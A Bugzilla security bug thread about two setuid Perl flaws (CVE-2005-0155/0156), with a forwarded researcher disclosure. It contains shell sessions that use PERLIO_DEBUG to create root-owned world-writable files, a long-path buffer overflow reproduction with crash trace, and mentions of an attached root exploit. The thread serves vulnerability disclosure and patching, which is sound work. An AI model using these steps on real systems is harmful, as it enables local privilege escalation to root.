Bugzilla – Bug 65354
VUL-0: CVE-2005-0156: 2 setuid perl problems
Last modified: 2021-11-04 16:01:57 UTC
From: "KF (Lists)" <kf_lists@digitalmunition.com> To: nick@ccl4.org, larry@wall.org, vendor-sec@lst.de Subject: [vendor-sec] [Fwd: setuid perl security issues] [-- Attachment #1 [details] --] [-- Type: text/plain, Encoding: 7bit, Size: 0.1K --] Excuse the poorly written description... I wrote it at 3am last night. This was also sent to perlbug@perl.org -KF [-- Attachment #2 [details]: setuid perl security issues --] [-- Type: message/rfc822, Encoding: 7bit, Size: 7.0K --] From: "KF (Lists)" <kf_lists@digitalmunition.com> To: perlbug@perl.org Subject: setuid perl security issues [-- Attachment #1 [details] --] [-- Type: text/plain, Encoding: 7bit, Size: 0K --] [-- Attachment #2 [details]: setuid_perl.txt --] [-- Type: text/plain, Encoding: 7bit, Size: 2.2K --] PERLIO_DEBUG If set to the name of a file or device then certain operations of PerlIO sub-system will be logged to that file (opened as append). Typical uses are UNIX: ./perlio.c: void PerlIO_debug(const char *fmt, ...) { ... if (!dbg) { char *s = PerlEnv_getenv("PERLIO_DEBUG"); if (s && *s) dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666); else dbg = -1; } If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op. else you can do the following either via sperl or vial sperl: sperl: kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4 -rwsr-xr-x 1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4 kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa kfinisterre@jdam:~$ umask 001 kfinisterre@jdam:~$ /usr/bin/sperl5.8.4 sperl needs fd script You should not call sperl directly; do you need to change a #! line from sperl to perl? kfinisterre@jdam:~$ ls -al /tmp/aaa -rw-rw-rw- 1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa setuid wrapper: kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper /usr/sbin/mooregister /usr/sbin/moopasswd -rwsr-xr-x 1 root root 2872 2003-11-20 15:28/usr/sbin/mooix-pty-helperc -rwsr-xr-x 1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd -rwsr-xr-x 1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister These are all setuid programs that invoke perl scripts. /usr/share/mooix/mooix-pty-helper.pl /usr/share/mooix/moopasswd.pl /usr/share/mooix/mooregister.pl kfinisterre@jdam:/tmp$ umask 001 kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2 kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper need a session dir at /usr/share/mooix/mooix-pty-helper.pl line 22, <CONFIG> line 98. kfinisterre@jdam:/tmp$ ls -al /tmp/oops2 -rw-rw-rw- 1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2 kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3 /usr/share/mooix/mooix-pty-helper.pl:0 fd 0 refcnt=0 /usr/share/mooix/mooix-pty-helper.pl:0 fd 1 refcnt=0 /usr/share/mooix/mooix-pty-helper.pl:0 fd 2 refcnt=0 kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2 hrmmm... kfinisterre@jdam:~$ ls -al /etc/ld.so.preload ls: /etc/ld.so.preload: No such file or directory gonna try to write an ld.so.preload exploit without trashing my box. hehe. fun +time. [-- Attachment #3 [details]: setuid_perl_overflow.txt --] [-- Type: text/plain, Encoding: quoted-printable, Size: 3.8K --] While looking at the source code to figure out what the details of my +PERLIO_DEBUG file overwrite bug I also found a buffer overflow... in perlio.c: if (dbg > 0) { dTHX; #ifdef USE_ITHREADS /* Use fixed buffer as sv_catpvf etc. needs SVs */ char buffer[1024]; char *s; STRLEN len; s = CopFILE(PL_curcop); if (!s) s = "(none)"; sprintf(buffer, "%s:%" IVdf " ", s, (IV) CopLINE(PL_curcop)); Set PERLIO_DEBUG to anything make a perl script calling sperl and run it with the full path (after placing it +in a long ass directory) #!/usr/bin/sperl5.8.4 print a; kfinisterre@jdam:/tmp$ +/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +A/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/test.pl Segmentation fault stat64("/usr/local/share/perl/5.8.0", 0xbfffd880) = -1 ENOENT (No such file or +directory) ** eip[40175563] eax[ffffffda] ecx[00008441] edx[000001b6] ebx[080677ad] +esp[bfffd294] ebp[bfffd2a8] esi[00008441] edi[40177d00] open("/tmp/lala", O_WRONLY|O_APPEND|O_CREAT|O_LARGEFILE, 0666) = 3 ** eip[4021898a] eax[00000000] ecx[08054e04] edx[bfffcd9c] ebx[402e95e0] +esp[bfffcbc8] ebp[bfffcbe0] esi[41414141] edi[bfffcd9c] --- SIGSEGV (Segmentation fault) @ 0 (0) --- upeek: ptrace(PTRACE_PEEKUSER,2970,48,0): No such process
<!-- SBZ_reproduce --> see above.
its unclear if these really exist. issue is not public yet.
Yes, I already saw this on perlbug. Fortunatelly we don't ship a suid-root perl... Dunno if we should fix this for old distris...
in this case this issue can be considered public.
I would prefer it fixed for all distros. The user might always make perl setuid root.
move to suselinux (away from securityinternal)
CAN-2005-0155
master swampid: 279
Use CAN-2005-0155 for the privilege escalation in debug mode Use CAN-2005-0156 for the buffer overflow
Created attachment 28090 [details] perl-5.8.6-bug33990.patch patch from Mandrake for both issues.
Yeah yeah, of course I already had the patch.
And the buffer overflow is a non issue.
Created attachment 28127 [details] ex_perl2.c the "non issue" sample root exploit.
i could at least reproduce it segfaulting .... so there is an issue.
No, it's not an issue. It's in the PERLIO_DEBUG which can be used to overwrite arbitrary files anyway, so the overflow doesn't make things worse...
packages submitted...
Created attachment 28387 [details] ex_perl2.c ex_perl2.c with bugs fixed ...
updates released.
CVE-2005-0156: CVSS v2 Base Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:P/A:N)